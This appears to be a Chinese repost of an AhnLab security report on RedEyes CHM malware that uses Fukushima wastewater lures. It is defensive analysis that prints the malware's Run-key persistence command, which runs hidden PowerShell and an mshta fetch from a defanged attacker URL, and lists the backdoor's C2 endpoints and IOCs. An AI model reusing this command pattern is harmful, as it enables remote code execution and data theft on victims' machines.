AhnLab安全紧急响应中心(ASEC)分析团队捕捉到了被认为是由RedEyes攻击组织创建的CHM恶意软件最近重新传播的情况。最近传播的CHM恶意软件的运行方式与3月份推出的“冒充国内金融公司安全邮件的CHM恶意软件”类似 。经确认, “持久化”过程中使用的命令是相同的。
在这次攻击中,利用了福岛污染水的内容,攻击者通过成为国内问题的话题引起用户的好奇心,诱导用户运行恶意文件。如图1所示,可以在CHM恶意软件执行时创建的帮助窗口中找到内容。
[图1]含有福岛污水排放的CHM恶意软件
进程中执行的恶意脚本如图2所示。过去,mshta命令是直接从CHM文件(hh.exe)执行的,但在最近分发的文件中,该命令被注册在RUN键中,以便在系统重新启动时执行。
[图2]CHM中的恶意脚本
- RUN 密钥注册
注册表路径:HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun
值名称:fGZtm
值:c:windowssystem32cmd.exe /c Powershell.exe -WindowStyle hide -NoLogo -NonInteractive -ep 绕过 ping - n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html
当 RUN 键中注册的命令运行时,通过 mshta 执行特定 URL 中存在的附加脚本。URL 包含 JS (JavaScript) 代码,该代码执行编码后的 PowerShell 命令。该过程与之前介绍的CHM恶意软件和M2RAT恶意软件攻击过程中使用的命令类似。
[图3] 4.html代码
解码后的PowerShell命令是一种后门,执行注册RUN key进行持久化、接收来自攻击者服务器的命令并下发命令执行结果的功能。它接收来自攻击者服务器的命令,根据命令可以执行文件上传下载、传输特定文件信息、注册表编辑等各种恶意操作。
- C2
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[计算机名]-[用户名] // 接收攻击者命令
hxxp://navercorp[.]ru/dashboard/image /202302 /com.php?R=[BASE64 Encoding] // 传递命令执行结果
[图4] 解码后的PowerShell命令
[图5] 接收命令
[表1] 接收命令列表
如果感染此类恶意软件,可以根据攻击者的命令执行下载附加文件、窃取信息等各种恶意行为,并造成巨大的损失。特别是,由于向国内用户分发的恶意代码根据分发目标包含感兴趣主题的内容来诱导用户执行,因此有必要避免阅读来历不明的电子邮件,并且不要执行附件文件.. 此外,您应该定期扫描您的电脑并将您的安全产品更新到最新的引擎。
[文件诊断]
Downloader/CHM.Generic (2023.09.02.00)
[IOC]
52f71fadf0ea5ffacd753e83a3d0af1a
hxxp://navercorp[.]ru/dashboard/image/202302/4.html
hxxp://navercorp[.]ru/dashboard/image/202302/com.php
转载来源:https://asec.ahnlab.com/ko/56654/
图片来源网络侵权可联系删除